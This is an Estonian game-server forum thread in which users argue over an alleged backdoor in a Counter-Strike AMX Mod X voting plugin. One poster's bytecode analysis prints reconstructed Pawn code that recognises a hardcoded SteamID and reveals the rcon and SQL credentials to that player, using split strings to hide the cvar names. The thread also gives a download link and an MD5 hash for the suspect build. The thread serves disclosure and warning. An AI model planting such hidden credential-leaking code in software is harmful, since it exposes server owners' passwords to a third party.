Tähelepanu kes kasutavad Shell.W pakutud galileo voted.

[Külaline misterx]

Ta mõtleb arvatavasti.

 

 

1. str_429 string "alynnn"
   
2. str_430 string "srv_announceEarlyVote"
   
3. str_431 string "1"
   
4. str_432 string "sprites/laserbeam.spr"
   
5. str_433 string "egert"
   
6. arr_072 array 9 ( 0x0 , 0x0 , 0x3F800000 , 0x0 , 0x0 , 0x0 , 0x0 , 0x0 , 0x0 )
   
7. str_434 string "%32s mp_timelimit: %f g_originalTimelimit: %f"
   
8. str_435 string "srv_handleEmpty(in)"
   
9. str_436 string "mp_timelimit"
   
10. str_437 string "mp_timelimit"
    
11. str_438 string "%32s mp_timelimit: %f g_originalTimelimit: %f"
    
12. str_439 string "srv_handleEmpty(out)"
    
13. str_440 string "mp_timelimit"
    

Need ei ole kuidagi seotud, pigem vaadata stringe 150 - 157 ja mõelda, kas neid kokku pannes saab nende cvaride nimed, mis ma üles loetlesin, kätte.

[Caffe 0]

Okei, ma ei ole mingi proff, ega midagi, aga ma analüüsisin veits tolle plugini baitkoodi ja kui ma õigesti välja lugesin, kirjutatakse autori ekraanile järgmiste cvar-ide sisu:

 

• rcon_password
  
• amx_sql_host
  
• amx_sql_user
  
• amx_sql_password
  

 

Kui keegi tahab ise üle vaadata, võin anda operatsioonide aadressid ja baitkoodi. Ootan väga Caffe kommentaari.

 

EDIT: Kõik kes te teema algatajat maha teete, tehke enne natuke researchi, pole mõtet hakata kohe puusalt paugutama hakata. Võimalik, et ta eksib (ja ka mina), aga sellist shitstormi pole ta küll ära teeninud.

 

Ta mõtleb arvatavasti.

 

 

1. str_429 string "alynnn"
   
2. str_430 string "srv_announceEarlyVote"
   
3. str_431 string "1"
   
4. str_432 string "sprites/laserbeam.spr"
   
5. str_433 string "egert"
   
6. arr_072 array 9 ( 0x0 , 0x0 , 0x3F800000 , 0x0 , 0x0 , 0x0 , 0x0 , 0x0 , 0x0 )
   
7. str_434 string "%32s mp_timelimit: %f g_originalTimelimit: %f"
   
8. str_435 string "srv_handleEmpty(in)"
   
9. str_436 string "mp_timelimit"
   
10. str_437 string "mp_timelimit"
    
11. str_438 string "%32s mp_timelimit: %f g_originalTimelimit: %f"
    
12. str_439 string "srv_handleEmpty(out)"
    
13. str_440 string "mp_timelimit"
    

 

 

Kood on "räpane", aga seda kõige ausamas mõttes. Alustasin selle kirjutamist alles algusaastateil, kui veel ei olnud erilisi teadmisi, seepärast on seal osa koodist küllaltki algeliselt kirjutatud ja paneb praegugi tagantjärele mõtlema, et no mis jama see siis veel on. Sinna on jäänud pisikesi juppe, mida plugin isegi ei kasuta, imelikud nimetused a la juku, juhan, kartul, egert jne, üks korralik puhastus oleks vajalik.

 

@misterx - sinu leitud cvare ei kuvata pluginas mitte mingil viisil, need on seal lihtsalt olemas, ent ükski event ei calli seda funktsiooni osa. Kunagi tegin proovi, kuidas saada mitmest jupist üks terve string kokku, sellepärast ongi seal ka SteamID jupitatud. SteamID on seal ainult sellepärast, et mulle serveriga liitudes teavitus tuleks ja eraldi cmd selle jaoks, kui ma ei pruugi enda Steamiga mängida. See cmd on seal täiesti avalikult kirjas - sxd_signature04 ja võite seda kõik kasvõi proovida, seal ei ole mingit backdoori, gosh..

 

@BORAT1337 - mis sa seal küll enda meelest nägid? Kui võib-olla, siis ainult see laserbeam.spr kaasamine faili - tegelikult plugin seda ei kasutagi. Üritasin teha sellist effekti, et mapi lõppedes baasis seisvate inimeste vahel tekiks laserite võrgustik, aga hell naw, ei saanud hakkama ja jäigi sinna paika.

 

sHell.w on varemgi tähelepanu äratanud backdooride tegemiste pärast (avaldab ainult .amxx faili)

 

 

Vaata postituse aastat, see plugin oli tehtud 2009 minu sõbrale ja tema tahtis ise, et ma sinna paneksin tema jaoks nö "backup plani" sisse, kuna tal ähvardati server ära võtta vms. Ja nii juhtuski, keegi sai tema serveri endale ja aastaks 2011 oli tema tõttu see vip plugin levinud nii laialt, et igaühel oli see juba olemas. Ei näe küll selle kirjelduses midagi erilist, miks peaks keegi seda üldse tahtma.

Muudetud 25. detsember, 2013 liikme Caffe'i poolt

[Mentalist 0]

str_150 string "rc"
   str_151 string "on_"
   str_152 string "pass"
   str_153 string "word"

rcon_password - good job. Pigem viska enda plugina source kood siia, siis näevad seda kõik. Ja las olla kõik seal olemas sellisel puhul. Elu lill ja kõik saavad üle vaadata. Teades sinu koode, siis omakasu on seal alati olemas. Ja ilmaasjata sa ei reklaamiks enda asju.

 

Wast - egas sa tegelikult pole kõige teravam pliiats.

 

Edit: Reaalis sellist rcon_password koodirida ei ole. http://pastebin.com/3LSttas4

Muudetud 25. detsember, 2013 liikme Mentalist'i poolt

[Pulber 10]

Kui ei taha ei pea kasutama ja koikk

[Caffe 0]

Source koodi ei "viska" ma mingil juhul siia, mõnele üksikule võin vaid näidata, sest see on ikkagi koodi osas privaatne ja ei soovi, et igaüks võiks seda oma äranägemise järgi muuta ja kuskile eraldi saidile uploadida jms.

 

Originaalis seda ei olegi, võib-olla loe mu eelnevad postitused siin teemas ka üle sellega seoses?

 

Sinna on jäänud pisikesi juppe, mida plugin isegi ei kasuta..

sinu leitud cvare ei kuvata pluginas mitte mingil viisil, need on seal lihtsalt olemas, ent ükski event ei calli seda funktsiooni osa. Kunagi tegin proovi, kuidas saada mitmest jupist üks terve string kokku, sellepärast ongi seal ka SteamID jupitatud. SteamID on seal ainult sellepärast, et mulle serveriga liitudes teavitus tuleks ja eraldi cmd selle jaoks, kui ma ei pruugi enda Steamiga mängida. See cmd on seal täiesti avalikult kirjas - sxd_signature04 ja võite seda kõik kasvõi proovida, seal ei ole mingit backdoori, gosh..

 

Aga palun, täiesti julgelt võite vaadata, miks sellised cvarid dekompileerides leiab - plugin neid ei kasuta mitte kuskil.

[spoiler=Pilti koodist]

 

 

Kui ei taha ei pea kasutama ja koikk

Just nimelt, mitte keegi ei käse kasutada, seega ei saa aru kuhu siin selle teemaga üritatakse jõuda. Wast on lihtsalt õnnetu oma serveriga juhtunu pärast ja ei suuda süüdlast leida.

[Wast. 10]

Alustame algusest, ma pole sind süüdistanud, et sain hacki selle pluginaga, vaid sina ise alustasid seda, kuid fakt on see, et mingil moel su vend pidevalt sai mu sql paroole.

Kui sul pole midagi varjata, postita siia oma .sma fail.

    str_149 string "rc"
   str_150 string "on_"
   str_151 string "pa"
   str_152 string "ss"
   str_153 string "word"
   str_154 string "amx_"
   str_155 string "sq"
   str_156 string "l_"
   str_157 string "host"

[Külaline .Siim.]

See pilt mhttp://www.upload.ee/image/3785673/Untitled3.jpg ütleb ära, et pole välis ühendust mis laseks teisest arvutis connectida jätke jabur jutt, kui ta tahaks andmeid rotida siis ta oleks siia .sma kirjutatud ka välisühenduse connect vms mis saadaks andmeid kuhugile teise masina aga tal ei ole seda siin, nii et rumal jutt jätta

[Caffe 0]

Alustame algusest, ma pole sind süüdistanud, et sain hacki selle pluginaga, vaid sina ise alustasid seda, kuid fakt on see, et mingil moel su vend pidevalt sai mu sql paroole.

Kui sul pole midagi varjata, postita siia oma .sma fail.

    str_149 string "rc"
   str_150 string "on_"
   str_151 string "pa"
   str_152 string "ss"
   str_153 string "word"
   str_154 string "amx_"
   str_155 string "sq"
   str_156 string "l_"
   str_157 string "host"

 

Nagu kana kaagutad sama teksti. Kas sa mitte ei tea juba oma süüdlast? http://kohila.eu/showthread.php?18718-flawlessile&p=256939&viewfull=1#post256939 Neil olid ju lausa olemas serveri FTP-d jne ja sina maurad mingi plugina kallal. Mul on varjata enda isikliku pluginat ja seal kasutatud meetmeid, mis kohe kindlasti avalikustaiseks pole mõeldud - kuidagi peab ju säilitama enda serverites mingi unikaalsuse. Ma juba näitasin osa, mis sinu kleebitud stringid dekompileerimise tulemiks tulevad, mis sa sellest enam siia postitad?

[Wast. 10]

Nagu kana kaagutad sama teksti. Kas sa mitte ei tea juba oma süüdlast? http://kohila.eu/showthread.php?18718-flawlessile&p=256939&viewfull=1#post256939 Neil olid ju lausa olemas serveri FTP-d jne ja sina maurad mingi plugina kallal. Mul on varjata enda isikliku pluginat ja seal kasutatud meetmeid, mis kohe kindlasti avalikustaiseks pole mõeldud - kuidagi peab ju säilitama enda serverites mingi unikaalsuse. Ma juba näitasin osa, mis sinu kleebitud stringid dekompileerimise tulemiks tulevad, mis sa sellest enam siia postitad?

Neil oli ftp jah, kuid peale seda sai kusutatud kõik failid, ning uuesti pandud värsked, ainuke mis samaks jäi, oli sinu plugin.

Ning kui plugin neid ei kasuta kuskil, mõte neid sisse toppida? Vaevalt sul oli raske neid kustutada sealt.

Muudetud 25. detsember, 2013 liikme Wast.'i poolt

[Külaline misterx]

Okei, eks ma siis seletan lahti, miks ma arvan, et seal backdoor on.

Kirjutan välja aadressite vahemiku ja kommenteerin, mida see teeb.

 

Funktsioon client_connect(id): http://pastebin.com/Vx6RuvWr

 

• 0x0FF20...0x0FF3C ALT registrisse aadressile 0xFFFFFF74 luuakse tühi muutuja (SteamID) suurusega 35 baiti
  
• 0x0FF40...0x0FF70 kutsutakse funktsioon get_user_authid, kus teine parameeter on ALT registri aadress 0xFFFFFF74 (SteamID), ehk antud muutujasse salvestatakse mängija authid või steamid (get_user_authid(id, SteamID))
  
• 0x10090...0x100B0 ALT registrisse aadressile 0xFFFFFEC8 kirjutatakse muutuja (St) suurusega 11 baiti aadressilt 0xC3E0, mille väärtus on "STEAM_0:0:"
  
• 0x100B4...0x100D4 ALT registrisse aadressile 0xFFFFFEB4 kirjutatakse muutuja (ea) suurusega 5 baiti aadressilt 0xC40C, mille väärtus on "6433"
  
• 0x100D8...0x100F8 ALT registrisse aadressile 0xFFFFFEA4 kirjutatakse muutuja (mID) suurusega 4 baiti aadressilt 0xC420, mille väärtus on "825"
  
• 0x100FC...0x10118 ALT registrisse aadressile 0xFFFFFE18 luuakse tühi muutuja (Handle) suurusega 35 baiti
  
• 0x1011C...0x10164 kutsutakse funktsioon format parameetritega ALT registri aadress 0xFFFFFE18 (Handle), aadress 0xC430, mille väärtus on "%s%s%s", ALT registri aadress 0xFFFFFEC8 (St), ALT registri aadress 0xFFFFFEB4 (ea), ALT registri aadress 0xFFFFFEA4 (mID), ehk muutujasse ALT registri aadressil 0xFFFFFE18 (Handle) kirjutatakse "STEAM_0:0:6433825" (format(Handle, "%s%s%s", St, ea, mID) => format(Handle, "%s%s%s", "STEAM_0:0:", "6433", "825"))
  
• 0x101CC...0x10204 kutsutakse funktsioon equal parameetritega ALT registri aadress 0xFFFFFF74 (SteamID) ja ALT registri aadress 0xFFFFFE18 (Handle) ehk kontrollitakse, kas stringide sisu on sama (equal(SteamID, Handle) => equal(SteamID, "STEAM_0:0:6433825")), kui funktsioon tagastab väärtuse, mis ei ole 0x00 (ehk täisarv, mille väärtus ei ole 0 või tõeväärtus true), hüppame aadressile 0x10248 [ehk kui mängija authid või steamid on autori oma, siis teeme hüppe, vastasel juhul lähme samast kohast edasi ja hiljem tuleb hüpe, millega järgnev osa vahele jäetakse]
  
• 0x10248...0x103A8 tehakse mäluga igasugu trikke, võib vahele jätta
  
• 0x103AC...0x10404 kutsutakse funktsioon set_task parameetritega aadress 0x1C, mille väärtus on 0.0, aadress 0xC468, mille väärtus on "alynnn", STACKi aadress 0xC, mille väärtus on kasutaja id, aadress 0x50E0, mille väärtus on tühi string, täisarv 0x0, mille väärtus on 0, aadress 0x50E4, mille väärtus on tühi string ja täisarv 0x0, mille väärtus on 0 (set_task(0.0, "alynnn", id, "", 0, "", 0)) [liigume edasi funktsiooni alynnn peale]
  

 

 

Funktsioon alynnn(id): http://pastebin.com/mwUC43CY

 

• 0x02044...0x020C0 luuakse tühjad muutujad, kõik suurusega 64 baiti, ALT registri aadressitele 0xFFFFFF00 (shellneat), 0xFFFFFE00 (shellneatt), 0xFFFFFD00 (shellneattt) ja 0xFFFFFC00 (shellneatttt)
  
• 0x020C4...0x020E4 ALT registri aadressile 0xFFFFFBF4 kirjuatatakse muutuja (sh1) suurusega 3 baiti aadressilt 0x5310, mille väärtus on "rc"
  
• 0x020E8...0x02108 ALT registri aadressile 0xFFFFFBE4 kirjuatatakse muutuja (sh2) suurusega 4 baiti aadressilt 0x531C, mille väärtus on "on_"
  
• 0x0210C...0x0212C ALT registri aadressile 0xFFFFFBD8 kirjuatatakse muutuja (sh3) suurusega 3 baiti aadressilt 0x532C, mille väärtus on "pa"
  
• 0x02130...0x02150 ALT registri aadressile 0xFFFFFBCC kirjuatatakse muutuja (sh32) suurusega 3 baiti aadressilt 0x5338, mille väärtus on "ss"
  
• 0x02154...0x02174 ALT registri aadressile 0xFFFFFBB8 kirjuatatakse muutuja (sh4) suurusega 5 baiti aadressilt 0x5344, mille väärtus on "word"
  
• 0x02178...0x02198 ALT registri aadressile 0xFFFFFBA4 kirjuatatakse muutuja (sh5) suurusega 5 baiti aadressilt 0x5358, mille väärtus on "amx_"
  
• 0x0219C...0x021BC ALT registri aadressile 0xFFFFFB98 kirjuatatakse muutuja (sh6) suurusega 3 baiti aadressilt 0x536C, mille väärtus on "sq"
  
• 0x021C0...0x021E0 ALT registri aadressile 0xFFFFFB8C kirjuatatakse muutuja (sh62) suurusega 3 baiti aadressilt 0x5378, mille väärtus on "l_"
  
• 0x021E4...0x02204 ALT registri aadressile 0xFFFFFB78 kirjuatatakse muutuja (sh7) suurusega 5 baiti aadressilt 0x5384, mille väärtus on "host"
  
• 0x02208...0x02228 ALT registri aadressile 0xFFFFFB64 kirjuatatakse muutuja (sh8) suurusega 5 baiti aadressilt 0x5398, mille väärtus on "user"
  
• 0x0222C...0x0229C luuakse tühjad muutujad, kõik suurusega 34 baiti, ALT registri aadressitele 0xFFFFFADC (sh10), 0xFFFFFA54 (sh11), 0xFFFFF9CC (sh12), 0xFFFFF944 (sh13)
  
• 0x022A0...0x022F8 kutsutakse funktsioon format parameetritega ALT registri aadressitess 0xFFFFFADC (sh10), aadress 0x53AC, mille väärtus on "%s%s%s%s%s", ALT registri aadress 0xFFFFFBF4 (sh1), ALT registri aadress 0xFFFFFBE4 (sh2), ALT registri aadress 0xFFFFFBD8 (sh3), ALT registri aadress 0xFFFFFBCC (sh32), ALT registri aadress 0xFFFFFBB8 (sh4) (format(sh10, "%s%s%s%s%s", sh1, sh2, sh3, sh32, sh4))
  
• 0x022FC...0x0234C8 kutsutakse funktsioon format parameetritega ALT registri aadressitess 0xFFFFFA54 (sh11), aadress 0x53D8, mille väärtus on "%s%s%s%s", ALT registri aadress 0xFFFFFBA4 (sh5), ALT registri aadress 0xFFFFFB98 (sh6), ALT registri aadress 0xFFFFFB8C (sh62), ALT registri aadress 0xFFFFFB78 (sh7), (format(sh11, "%s%s%s%s", sh5, sh6, sh62, sh7))
  
• 0x02350...0x023A0 kutsutakse funktsioon format parameetritega ALT registri aadressitess 0xFFFFF9CC (sh12), aadress 0x53FC, mille väärtus on "%s%s%s%s", ALT registri aadress 0xFFFFFBA4 (sh5), ALT registri aadress 0xFFFFFB98 (sh6), ALT registri aadress 0xFFFFFB8C (sh62), ALT registri aadress 0xFFFFFB64 (sh8), (format(sh12, "%s%s%s%s", sh5, sh6, sh62, sh8))
  
• 0x023A4...0x023FC kutsutakse funktsioon format parameetritega ALT registri aadressitess 0xFFFFF944 (sh13), aadress 0x5420, mille väärtus on "%s%s%s%s%s", ALT registri aadress 0xFFFFFBA4 (sh5), ALT registri aadress 0xFFFFFB98 (sh6), ALT registri aadress 0xFFFFFB8C (sh62), ALT registri aadress 0xFFFFFBD8 (sh3)), ALT registri aadress 0xFFFFFBCC (sh32), (format(sh13, "%s%s%s%s", sh5, sh6, sh62, sh3, sh32))
  
• 0x02400...0x024CC kutsutakse funktsioon get_cvar_string 4 korda vastavate parameetritega (aadressid leiate pastebinist) sh10 ja shellneat, sh11 ja shellneatt, sh12 ja shellneattt, sh13 ja shellneatttt
  
• 0x024D0...0x0257C kustutakse funktsioon shellw_colored_print 4 korda, esimene parameeter on alati id, teine vastavalt shellneat, shellneatt, shellneattt, shellneatttt
  

 

Kes ei viisti ise baitkoodi lugeda, siis minu ettekujutus Pawn koodist on selline: (minu Pawn veits longab,

public client_connect(id) {
   new SteamID[35];
   get_user_authid(id, SteamID);
   new St[] = "STEAM_0:0:";
   new ea[] = "6433";
   new mID[] = "825";
   new Handle[35];
   format(Handle, "%s%s%s", St, ea, mID); //Handle = "STEAM_0:0:6433825"
   if(equal(SteamID, Handle))
       set_task(0.0, "alynnn", id);
}
public alynnn(id) {
   new shellneat[64];
   new shellneatt[64];
   new shellneattt[64];
   new shellneatttt[64];
   new sh1[] = "rc";
   new sh2[] = "on_";
   new sh3[] = "pa";
   new sh32[] = "ss";
   new sh4[] = "word";
   new sh5[] = "amx_";
   new sh6[] = "sq";
   new sh62[] = "l_";
   new sh7[] = "host";
   new sh8[] = "user";
   new sh10[34];
   new sh11[34];
   new sh12[34];
   new sh13[34];
   format(sh10, "%s%s%s%s%s", sh1, sh2, sh3, sh32, sh4); //sh10 = "rcon_password"
   format(sh11, "%s%s%s%s", sh5, sh6, sh62, sh7); //sh11 = "amx_sql_host"
   format(sh12, "%s%s%s%s", sh5, sh6, sh62, sh8); //sh12 = "amx_sql_user"
   format(sh13, "%s%s%s%s%s", sh5, sh6, sh62, sh3, sh32); //sh13 = "amx_sql_pass"
   get_cvar_string(sh10, shellneat);
   get_cvar_string(sh11, shellneatt);
   get_cvar_string(sh12, shellneattt);
   get_cvar_string(sh13, shellneatttt);
   shellw_colored_print(id, shellneat);
   shellw_colored_print(id, shellneatt);
   shellw_colored_print(id, shellneattt);
   shellw_colored_print(id, shellneatttt);
}

EDIT: Saada mulle kood, ma kompilleerin ära ja võrdlen baitkoodi.

EDIT2: Kui keegi arvab, et minu baitkood on muudetud, siis kasutan tööriista nimega amxxdump, tõmmata saab siit: http://forums.alliedmods.net/showthread.php?t=52875

Võtke ise lahti, õpetus on juures, kuidas kasutada.

Muudetud 25. detsember, 2013 liikme misterx'i poolt
Tehke spoiler korda plz

[Külaline .Siim.]

Päris vigane sinu tehtud pawn

/tmp/textWRTAvi.sma(3) : error 017: undefined symbol "get_user_authid"/tmp/textWRTAvi.sma(8) : error 017: undefined symbol "format"

/tmp/textWRTAvi.sma(9) : error 017: undefined symbol "equal"

/tmp/textWRTAvi.sma(10) : error 017: undefined symbol "set_task"

/tmp/textWRTAvi.sma(31) : error 017: undefined symbol "format"

/tmp/textWRTAvi.sma(32) : error 017: undefined symbol "format"

/tmp/textWRTAvi.sma(33) : error 017: undefined symbol "format"

/tmp/textWRTAvi.sma(34) : error 017: undefined symbol "format"

/tmp/textWRTAvi.sma(35) : error 017: undefined symbol "get_cvar_string"

/tmp/textWRTAvi.sma(36) : error 017: undefined symbol "get_cvar_string"

/tmp/textWRTAvi.sma(37) : error 017: undefined symbol "get_cvar_string"

/tmp/textWRTAvi.sma(38) : error 017: undefined symbol "get_cvar_string"

/tmp/textWRTAvi.sma(39) : error 017: undefined symbol "shellw_colored_print"

/tmp/textWRTAvi.sma(40) : error 017: undefined symbol "shellw_colored_print"

/tmp/textWRTAvi.sma(41) : error 017: undefined symbol "shellw_colored_print" /tmp/textWRTAvi.sma(42) : error 017: undefined symbol "shellw_colored_print"

[Külaline misterx]

Päris vigane sinu tehtud pawn

No shit, et see ei kompilleeru. Kõik need funktsioonid on olemas, kui õiged headerid laadida, kuigi ma kahtlen, et see siis ka kompilleeruks. Mõte oli see, et sa loed koodi ja katsud sellest aru saada.

[Külaline .Siim.]

No shit, et see ei kompilleeru. Kõik need funktsioonid on olemas, kui õiged headerid laadida, kuigi ma kahtlen, et see siis ka kompilleeruks. Mõte oli see, et sa loed koodi ja katsud sellest aru saada.

Ikkagi ma olen Caffe poolt, see teema on lihtsalt üks bullshit, teema algjata soovib lihtsalt süüdistada kohila vendade asemel kz.ee omaniku.

[Wast. 10]

Ikkagi ma olen Caffe poolt, see teema on lihtsalt üks bullshit, teema algjata soovib lihtsalt süüdistada kohila vendade asemel kz.ee omaniku.

Siiski kohila tüüpidest on 1 caffe vend.

[Külaline .Siim.]

Siiski kohila tüüpidest on 1 caffe vend.

vend las olgu aga caffe pole süüdi, et vend sitta keerab

[Wast. 10]

vend las olgu aga caffe pole süüdi, et vend sitta keerab

Kas ma olen caffed süüdistanud? Ütlesin, et tema plugina abil tehakse seda.

[Caffe 0]

Väga veider, misterx, sest sinu dekompilatsiooni järgi paneksin tegelikult ise täpselt samasuguse koodi kokku.. ent pilt minu juba kuid tagasi muudetud sma failis on teistsugune. Kust pärineb su amxx fail? Loodetavasti mitte minu signatuurist (eksitav link eemaldatud). Sest kõige viimases versioonis, mis minu arvuti kuupäeva järgi näitab, et mõni kuu tagasi muudetud faili viimati, ei ole sellist tulemit.

 

Saatsin sulle koodifaili, kompileeri ära ja võrdle. Ise kardan, et kurjad inimesed minu kodus on valele asjale näpud taha saanud, muud võimalust lihtsalt pole.

[k2ska 0]

shellshell..

igastahes mul endal ka sellega kogemus olemas ning ka ühel sõbral eemaldasin selle plugina ja oligi asi lahendatud

Kunagi pidi see lõpuks ju välja tulema

[Külaline olari9]

Shellikene, mida need kuupäevakesed loevad?

Jälgede katmiseks saab täiesti kuupäevad ära muuta ja ongi asjadega kõik korras.

Minu nägemuse järgi tõestas misterx täielikult ära selle, et seal on täiesti backdoor sees ja sellest ka õpetus kõigile CSi inimestele, ärge lihtsalt kasutage Shelli poolt valmistatud asju, kui te tõemeeli soovite, et teie serverid ka kuhugi jõuavad.

Lihtne

[Reactive 0]

Idiootsus? Miks peaks konkreetne vahvli moderaator enda mainet mustama tänu sellele vigasele skriptile? Natukene loogilist mõtlemist ka kuskil on? Tehke kõigepealt midagi enda oma ning siis tuleks tulla süüdistama inimest. Bsh, bullshit teema.

[Külaline olari9]

Loe eelmise lehe viimast postitust korra.

[Wast. 10]

Kust pärineb su amxx fail?

Sealt kus ka minu, ehk kz.ee foorumist

[Caffe 0]

No mina olen täiesti aus kui ütlen, et minu koodis ei ole backdoori. Kui misterx selle sealt aga leidis, siis on selleks ainuke võimalus - vend. Enam küll ühe katuse all ei ela, aga varem küll. Täiesti võimalik, et võis virutada minu arvutist koodi ja ümber teha, sest teadmised tal on ja nende serveritega jamamise taga ta ilmselt oli, nagu räägitakse.

[Külaline misterx]

http://alynn.kz.ee/galileo_shellw_package.zip on minu amxx faili link. Võrdlesin sellega, mille Caffe saatis, kadunud oli suur hulk funktsioone: http://pastebin.com/2WyzF3aD Osa neist on kindlasti kadunud selle pärast, et ma võtsin välja kõik funktsioonid, mis vajasid päiseid, mida mul ei olnud.

 

EDIT: Kõik, kellel on serveril peal Caffe muudetud, uurige välja amxx faili MD5 hash (guugeldage, selliseid web serviceid on suht lõpmatult), backdooriga faili MD5 on A07FEE95D8838E5BD0F8F78D1431A6D1

 

Üks asi, mis tundub imelik, on see, et kui ma baitkoodist õigesti aru sain, siis peaks iga kord, kui Caffe läheb serverisse, kus on peal backdooriga skript, ta kohe nägema, et tema ekraanile kirjutatakse mingisuguseid paroole. Lisaks sellele tundub mulle, et käsku, mis paroole näitab, ei eksisteeri, ainuke võimalus neid näha on omada õiget authid-d. Ma veel uurin, ehk leian kuskilt viiteid sellisele käsule.

 

EDIT2: Ei leidnud taolist käsku...

Muudetud 25. detsember, 2013 liikme misterx'i poolt

[Finnish 10]

http://alynn.kz.ee/ That url tho